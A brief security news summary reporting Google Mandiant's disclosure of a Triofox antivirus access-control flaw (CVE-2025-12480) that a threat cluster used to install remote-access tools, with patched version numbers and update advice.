Hackers Hijacked Antivirus Features to Install Malware - Here's What We Know

Summary

Google Mandiant researchers disclosed a critical 9.1‑severity vulnerability (CVE‑2025‑12480) in Triofox’s built‑in antivirus that allowed improper access control, enabling the UNC6485 threat cluster to hijack the feature and install remote‑access tools such as Zoho Assist, AnyDesk, Plink and PuTTY. The flaw was introduced in early April 2025 and patched on July 26 in version 16.7.10368.56560, but the attack was observed a month later, indicating delayed remediation. Attackers leveraged the compromised platform for lateral movement and SSH tunneling to facilitate data exfiltration. Gladinet released a newer version 16.10.10408.56683 on October 14, which is recommended for immediate deployment.